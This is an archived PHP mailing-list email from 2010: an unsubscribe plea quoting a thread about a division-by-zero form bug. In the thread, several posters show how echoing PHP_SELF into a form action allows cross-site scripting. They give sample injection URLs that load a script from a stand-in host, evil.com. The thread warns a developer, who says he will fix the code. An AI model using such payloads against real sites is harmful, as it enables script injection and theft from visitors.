I have tried and tried, countless times to be removed from this list... still when I go to my deleted items I can see that emails leak through. If there is an administrator who can simply delete me ( simply because I can not seem to do this correctly) I would greatly appreciate it. Thank You! Sincerely, Michael Roberts Executive Recruiter Corporate Staffing Services 150 Monument Road, Suite 510 Bala Cynwyd, PA 19004 P 610-771-1084 F 610-771-0390 E mroberts@xxxxxxxxxxx Check out my recent feature article in Professional Surveyor 12/09 edition. http://www.profsurv.com/magazine/article.aspx?i=70379 -----Original Message----- From: Gary [mailto:gwpaul@xxxxxxx] Sent: Thursday, March 11, 2010 7:51 AM To: php-general@xxxxxxxxxxxxx Subject: Re: Division by 0 I love this place, thank you to everyone that posted, I will make changes to make it safer. Thanks again to everyone. gary "Jochem Maas" <jochem@xxxxxxxxxxxxx> wrote in message news:4B98DE7E.8020506@xxxxxxxxxxxxxxxx > Op 3/10/10 11:39 PM, Daniel Egeberg schreef: >> On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban <dmitry@xxxxxxxxx> wrote: >>> Hi Jochem, >>> >>> Jochem Maas wrote: >>>> >>>> Op 3/10/10 6:23 PM, Joseph Thayne schreef: >>>>> >>>>> Looks to me like you are closing your form before you put anything in >>>>> it. Therefore, the loan_amount is not set making the value 0. Follow >>>>> the math, and you are dividing by 1-1. >>>>> >>>>> Change this line: >>>>> >>>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" >>>>> method="post"></form> >>>>> >>>>> to: >>>>> >>>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> >>>> >>>> this is a XSS waiting to happen. I can put something like the following >>>> in >>>> the request uri: >>>> >>>> index.php?" onsubmit="evil()"><script >>>> src="http://www.evil.com/evi.js";></script> >>>> >>> Apparently it's not going to work. PHP_SELF does not include query >>> string. >>> So it is safe to use it this way. >>> >>> Regards, >>> Dmitry >> >> No, it is not safe... >> >> This won't work: >> index.php?" onsubmit="evil()"><script >> src="http://www.evil.com/evi.js";></script> >> >> But this will: >> index.php/" onsubmit="evil()"><script >> src="http://www.evil.com/evi.js";></script> > > yeah sorry, I was lax and made the query string mistake, > the issue stands though as Daniel pointed out. > > > >> > > > __________ Information from ESET Smart Security, version of virus > signature database 4933 (20100310) __________ > > The message was checked by ESET Smart Security. > > http://www.eset.com > > > __________ Information from ESET Smart Security, version of virus signature database 4933 (20100310) __________ The message was checked by ESET Smart Security. http://www.eset.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
